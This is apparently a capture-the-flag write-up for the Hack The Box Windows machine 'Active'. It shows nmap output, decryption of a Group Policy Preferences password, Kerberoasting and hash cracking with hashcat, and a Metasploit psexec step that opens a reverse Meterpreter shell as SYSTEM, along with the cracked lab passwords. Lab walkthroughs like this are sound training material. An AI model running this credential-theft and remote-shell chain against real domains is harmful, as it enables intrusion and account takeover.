Active

OS: Windows, Difficulty: Easy, IP: 10.10.10.100

Initial Enumeration

# Nmap 7.70 scan initiated Fri Jul 26 15:34:45 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,38446,47001 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.22s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2019-07-26 09:58:04Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5722/tcp  open   msrpc         Microsoft Windows RPC
9389/tcp  open   mc-nmf        .NET Message Framing
38446/tcp closed unknown
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/26%OT=53%CT=38446%CU=41736%PV=Y%DS=2%DC=T%G=Y%TM=5D3
OS:AD102%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%
OS:TS=7)SEQ(SP=FC%GCD=1%ISR=107%TI=I%CI=I%TS=7)SEQ(SP=FC%GCD=1%ISR=107%TI=I
OS:%CI=I%II=I%TS=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54
OS:DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%
OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=
OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q
OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%
OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6m50s, deviation: 0s, median: -6m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-07-26 15:29:12
|_  start_date: 2019-07-26 15:19:25

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   222.63 ms 10.10.14.1
2   222.77 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 26 15:38:02 2019 -- 1 IP address (1 host up) scanned in 197.65 seconds
$ smbmap -u "" -H 10.10.10.100
[+] Finding open SMB ports....       
[+] User SMB session establishd on 10.10.10.100...                         
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                                                                                     
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS  
        C$                                                      NO ACCESS  
        IPC$                                                    NO ACCESS  
        NETLOGON                                                NO ACCESS  
        Replication                                             READ ONLY  
        SYSVOL                                                  NO ACCESS  
        Users                                                   NO ACCESS  


Fetch the Groups.xml file and crack the cpassword value to get credentials for SVC_TGS user.

smbclient -U "" \\\\10.10.10.100\\Replication "" -c 'get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml'
$ python Gpprefdecrypt.py "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
$ smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100                                                                                  
[+] Finding open SMB ports....       
[+] User SMB session establishd on 10.10.10.100...                         
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                                                                                     
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS  
        C$                                                      NO ACCESS  
        IPC$                                                    NO ACCESS  
        NETLOGON                                                READ ONLY  
        Replication                                             READ ONLY  
        SYSVOL                                                  READ ONLY  
        Users                                                   READ ONLY  
$ python GetUserSPNs.py -dc-ip 10.10.10.100 -request active.htb/SVC_TGS:GPPstillStandingStrong2k18

Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                  
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2018-07-30 22:47:40.656520 



$krb5tgs$23$****..........HUGE VALUE
hashcat -m 13100 -a 0 -o admin-cracked -d 1 -D 1 admin-hash /usr/share/wordlists/rockyou.txt --force

Used hashcat to get the value from the TGS hash. The password for Administrator user is Ticketmaster1968

User Own

Root Own

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options                            

Module options (exploit/windows/smb/psexec):                               

   Name                  Current Setting  Required  Description            
   ----                  ---------------  --------  -----------            
   RHOSTS                                 yes       The target address range or CIDR identifier                                                        
   RPORT                 445              yes       The SMB service port (TCP)                                                                         
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing                                     
   SERVICE_DISPLAY_NAME                   no        The service display name                                                                           
   SERVICE_NAME                           no        The service name       
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share 
   SMBDomain             .                no        The Windows domain to use for authentication                                                       
   SMBPass                                no        The password for the specified username                                                            
   SMBUser                                no        The username to authenticate as                                                                    


Exploit target:                      

   Id  Name                          
   --  ----                          
   0   Automatic                     


msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.100                 
RHOSTS => 10.10.10.100               
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator               
SMBUser => Administrator             
msf5 exploit(windows/smb/psexec) > set SMBPass Ticketmaster1968            
SMBPass => Ticketmaster1968          
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.14.13:4444                        
[*] 10.10.10.100:445 - Connecting to the server...                         
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'Administrator'...                                                                   
[*] 10.10.10.100:445 - Selecting PowerShell target                         
[*] 10.10.10.100:445 - Executing the payload...                            
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...                                                   
[*] Sending stage (179779 bytes) to 10.10.10.100                           
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.100:61166) at 2019-07-26 17:53:45 +0530                                                 

msf5 exploit(windows/smb/psexec) > sessions -l                             

Active sessions                      
===============                      

  Id  Name  Type                     Information               Connection  
  --  ----  ----                     -----------               ----------  
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DC  10.10.14.13:4444 -> 10.10.10.100:61166 (10.10.10.100)
C:\Users\Administrator\Desktop>type root.txt                               
type root.txt                        
b5fc7***

C:\Users\SVC_TGS\Desktop>type user.txt                               
type user.txt                        
86d67***

Learning Outcome

This was a fun box, teached me new things about Windows AD testing, hashcat, and PSExec attack.

Last updated